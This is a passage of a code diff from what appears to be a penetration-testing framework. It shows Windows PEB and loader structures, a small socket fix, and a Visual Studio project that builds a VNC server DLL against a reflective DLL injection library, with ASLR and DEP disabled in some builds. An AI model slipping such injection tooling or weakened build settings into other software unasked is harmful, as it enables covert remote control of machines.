UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
typedef struct __PEB // 65 elements, 0x210 bytes
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
typedef struct
{
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
//===============================================================================================//
#endif
//===============================================================================================//

2
external/source/vncdll/winvnc/VSocket.cpp vendored Normal file → Executable file
View File

@ -70,7 +70,7 @@ class VSocket;
////////////////////////////////////////////////////////
// *** Lovely hacks to make Win32 work. Hurrah!
#ifdef __WIN32__
#if defined(__WIN32__) && !defined(EWOULDBLOCK)
#define EWOULDBLOCK WSAEWOULDBLOCK
#endif

1200
external/source/vncdll/winvnc/WinVNC.vcproj vendored
View File

File diff suppressed because it is too large Load Diff

473
external/source/vncdll/winvnc/WinVNC.vcxproj vendored Executable file
View File

@ -0,0 +1,473 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectName>winvnc</ProjectName>
<ProjectGuid>{EA6A09AC-04BB-423D-8842-CA48DF901058}</ProjectGuid>
<RootNamespace>WinVNC</RootNamespace>
<SccLocalPath>.</SccLocalPath>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<EmbedManifest>false</EmbedManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<EmbedManifest>false</EmbedManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Midl>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>Win32</TargetEnvironment>
</Midl>
<ClCompile>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<BrowseInformation>true</BrowseInformation>
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0409</Culture>
</ResourceCompile>
<PreLinkEvent>
<Command />
</PreLinkEvent>
<Link>
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
<MapExports>true</MapExports>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>X64</TargetEnvironment>
<GenerateTypeLibrary>false</GenerateTypeLibrary>
<HeaderFileName />
<DllDataFileName />
</Midl>
<ClCompile>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x64__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<BrowseInformation>true</BrowseInformation>
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0409</Culture>
</ResourceCompile>
<PreLinkEvent>
<Command />
</PreLinkEvent>
<Link>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<SuppressStartupBanner>false</SuppressStartupBanner>
<ManifestFile />
<MapExports>false</MapExports>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress />
<DataExecutionPrevention />
<TargetMachine>NotSet</TargetMachine>
<AllowIsolation>true</AllowIsolation>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Midl>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>Win32</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<BufferSecurityCheck>true</BufferSecurityCheck>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0809</Culture>
</ResourceCompile>
<Link>
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention />
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<BufferSecurityCheck>true</BufferSecurityCheck>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0809</Culture>
</ResourceCompile>
<Link>
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention />
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="vncdll.cpp" />
<ClCompile Include="vncEncodeCoRRE.cpp" />
<ClCompile Include="vncEncodeHexT.cpp" />
<ClCompile Include="vncEncoder.cpp" />
<ClCompile Include="vncEncodeRRE.cpp" />
<ClCompile Include="vncEncodeTight.cpp" />
<ClCompile Include="vncEncodeZlib.cpp" />
<ClCompile Include="vncEncodeZlibHex.cpp" />
<ClCompile Include="omnithread\nt.cpp" />
<ClCompile Include="libjpeg\jcapimin.c" />
<ClCompile Include="libjpeg\jcapistd.c" />
<ClCompile Include="libjpeg\jccoefct.c" />
<ClCompile Include="libjpeg\jccolor.c" />
<ClCompile Include="libjpeg\jcdctmgr.c" />
<ClCompile Include="libjpeg\jchuff.c" />
<ClCompile Include="libjpeg\jcinit.c" />
<ClCompile Include="libjpeg\jcmainct.c" />
<ClCompile Include="libjpeg\jcmarker.c" />
<ClCompile Include="libjpeg\jcmaster.c" />
<ClCompile Include="libjpeg\jcomapi.c" />
<ClCompile Include="libjpeg\jcparam.c" />
<ClCompile Include="libjpeg\jcphuff.c" />
<ClCompile Include="libjpeg\jcprepct.c" />
<ClCompile Include="libjpeg\jcsample.c" />
<ClCompile Include="libjpeg\jctrans.c" />
<ClCompile Include="libjpeg\jdapimin.c" />
<ClCompile Include="libjpeg\jdapistd.c" />
<ClCompile Include="libjpeg\jdatadst.c" />
<ClCompile Include="libjpeg\jdatasrc.c" />
<ClCompile Include="libjpeg\jdcoefct.c" />
<ClCompile Include="libjpeg\jdcolor.c" />
<ClCompile Include="libjpeg\jddctmgr.c" />
<ClCompile Include="libjpeg\jdhuff.c" />
<ClCompile Include="libjpeg\jdinput.c" />
<ClCompile Include="libjpeg\jdmainct.c" />
<ClCompile Include="libjpeg\jdmarker.c" />
<ClCompile Include="libjpeg\jdmaster.c" />
<ClCompile Include="libjpeg\jdmerge.c" />
<ClCompile Include="libjpeg\jdphuff.c" />
<ClCompile Include="libjpeg\jdpostct.c" />
<ClCompile Include="libjpeg\jdsample.c" />
<ClCompile Include="libjpeg\jdtrans.c" />
<ClCompile Include="libjpeg\jerror.c" />
<ClCompile Include="libjpeg\jfdctflt.c" />
<ClCompile Include="libjpeg\jfdctfst.c" />
<ClCompile Include="libjpeg\jfdctint.c" />
<ClCompile Include="libjpeg\jidctflt.c" />
<ClCompile Include="libjpeg\jidctfst.c" />
<ClCompile Include="libjpeg\jidctint.c" />
<ClCompile Include="libjpeg\jidctred.c" />
<ClCompile Include="libjpeg\jmemmgr.c" />
<ClCompile Include="libjpeg\jmemnobs.c" />
<ClCompile Include="libjpeg\jquant1.c" />
<ClCompile Include="libjpeg\jquant2.c" />
<ClCompile Include="libjpeg\jutils.c" />
<ClCompile Include="zlib\adler32.c" />
<ClCompile Include="zlib\compress.c" />
<ClCompile Include="zlib\crc32.c" />
<ClCompile Include="zlib\deflate.c" />
<ClCompile Include="zlib\infblock.c" />
<ClCompile Include="zlib\infcodes.c" />
<ClCompile Include="zlib\inffast.c" />
<ClCompile Include="zlib\inflate.c" />
<ClCompile Include="zlib\inftrees.c" />
<ClCompile Include="zlib\infutil.c" />
<ClCompile Include="zlib\maketree.c" />
<ClCompile Include="zlib\trees.c" />
<ClCompile Include="zlib\uncompr.c" />
<ClCompile Include="zlib\zutil.c" />
<ClCompile Include="d3des.c" />
<ClCompile Include="DynamicFn.cpp" />
<ClCompile Include="FileTransferItemInfo.cpp" />
<ClCompile Include="MinMax.cpp" />
<ClCompile Include="RectList.cpp" />
<ClCompile Include="stdhdrs.cpp" />
<ClCompile Include="tableinitcmtemplate.cpp">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
</ClCompile>
<ClCompile Include="tableinittctemplate.cpp">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
</ClCompile>
<ClCompile Include="tabletranstemplate.cpp">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
</ClCompile>
<ClCompile Include="translate.cpp" />
<ClCompile Include="TsSessions.cpp" />
<ClCompile Include="VideoDriver.cpp" />
<ClCompile Include="vncauth.c" />
<ClCompile Include="vncBuffer.cpp" />
<ClCompile Include="vncClient.cpp" />
<ClCompile Include="vncDesktop.cpp" />
<ClCompile Include="vncInstHandler.cpp" />
<ClCompile Include="vncKeymap.cpp" />
<ClCompile Include="vncRegion.cpp" />
<ClCompile Include="vncServer.cpp" />
<ClCompile Include="vncService.cpp" />
<ClCompile Include="vncSockConnect.cpp" />
<ClCompile Include="VSocket.cpp" />
<ClCompile Include="WallpaperUtils.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="omnithread\nt.h" />
<ClInclude Include="omnithread\omnithread.h" />
<ClInclude Include="common.h" />
<ClInclude Include="libjpeg\jchuff.h" />
<ClInclude Include="libjpeg\jconfig.h" />
<ClInclude Include="libjpeg\jdct.h" />
<ClInclude Include="libjpeg\jdhuff.h" />
<ClInclude Include="libjpeg\jerror.h" />
<ClInclude Include="libjpeg\jinclude.h" />
<ClInclude Include="libjpeg\jmemsys.h" />
<ClInclude Include="libjpeg\jmorecfg.h" />
<ClInclude Include="libjpeg\jpegint.h" />
<ClInclude Include="libjpeg\jpeglib.h" />
<ClInclude Include="libjpeg\jversion.h" />
<ClInclude Include="zlib\deflate.h" />
<ClInclude Include="zlib\infblock.h" />
<ClInclude Include="zlib\infcodes.h" />
<ClInclude Include="zlib\inffast.h" />
<ClInclude Include="zlib\inffixed.h" />
<ClInclude Include="zlib\inftrees.h" />
<ClInclude Include="zlib\infutil.h" />
<ClInclude Include="zlib\trees.h" />
<ClInclude Include="zlib\zconf.h" />
<ClInclude Include="zlib\zlib.h" />
<ClInclude Include="zlib\zutil.h" />
<ClInclude Include="AdministrationControls.h" />
<ClInclude Include="d3des.h" />
<ClInclude Include="DynamicFn.h" />
<ClInclude Include="FileTransferItemInfo.h" />
<ClInclude Include="IncomingConnectionsControls.h" />
<ClInclude Include="InputHandlingControls.h" />
<ClInclude Include="keysymdef.h" />
<ClInclude Include="MatchWindow.h" />
<ClInclude Include="MinMax.h" />
<ClInclude Include="PollControls.h" />
<ClInclude Include="QuerySettingsControls.h" />
<ClInclude Include="RectList.h" />
<ClInclude Include="resource.h" />
<ClInclude Include="rfb.h" />
<ClInclude Include="rfbproto.h" />
<ClInclude Include="SharedDesktopArea.h" />
<ClInclude Include="stdhdrs.h" />
<ClInclude Include="translate.h" />
<ClInclude Include="TsSessions.h" />
<ClInclude Include="VideoDriver.h" />
<ClInclude Include="vncAbout.h" />
<ClInclude Include="vncauth.h" />
<ClInclude Include="vncBuffer.h" />
<ClInclude Include="vncClient.h" />
<ClInclude Include="vncDesktop.h" />
<ClInclude Include="vncEncodeCoRRE.h" />
<ClInclude Include="vncEncodeHexT.h" />
<ClInclude Include="vncEncoder.h" />
<ClInclude Include="vncEncodeRRE.h" />
<ClInclude Include="vncEncodeTight.h" />
<ClInclude Include="vncEncodeZlib.h" />
<ClInclude Include="vncEncodeZlibHex.h" />
<ClInclude Include="vncInstHandler.h" />
<ClInclude Include="vncKeymap.h" />
<ClInclude Include="vncPasswd.h" />
<ClInclude Include="vncRegion.h" />
<ClInclude Include="vncServer.h" />
<ClInclude Include="vncService.h" />
<ClInclude Include="vncSockConnect.h" />
<ClInclude Include="VSocket.h" />
<ClInclude Include="VTypes.h" />
<ClInclude Include="WallpaperUtils.h" />
</ItemGroup>
<ItemGroup>
<Text Include="README.TXT" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

527
external/source/vncdll/winvnc/WinVNC.vcxproj.filters vendored Executable file
View File

@ -0,0 +1,527 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{804c711f-35c6-4aac-9b8a-9cf8b528de85}</UniqueIdentifier>
<Extensions>.cpp, .c</Extensions>
</Filter>
<Filter Include="Source Files\encoder">
<UniqueIdentifier>{7847cf33-fe03-48ad-9a94-a8956821f343}</UniqueIdentifier>
<Extensions>.cpp, .c</Extensions>
</Filter>
<Filter Include="Source Files\omnithread">
<UniqueIdentifier>{a328f948-40d7-4548-9451-66b620124477}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\libjpeg">
<UniqueIdentifier>{cb642898-1056-43ee-828a-40004b207331}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\zlib">
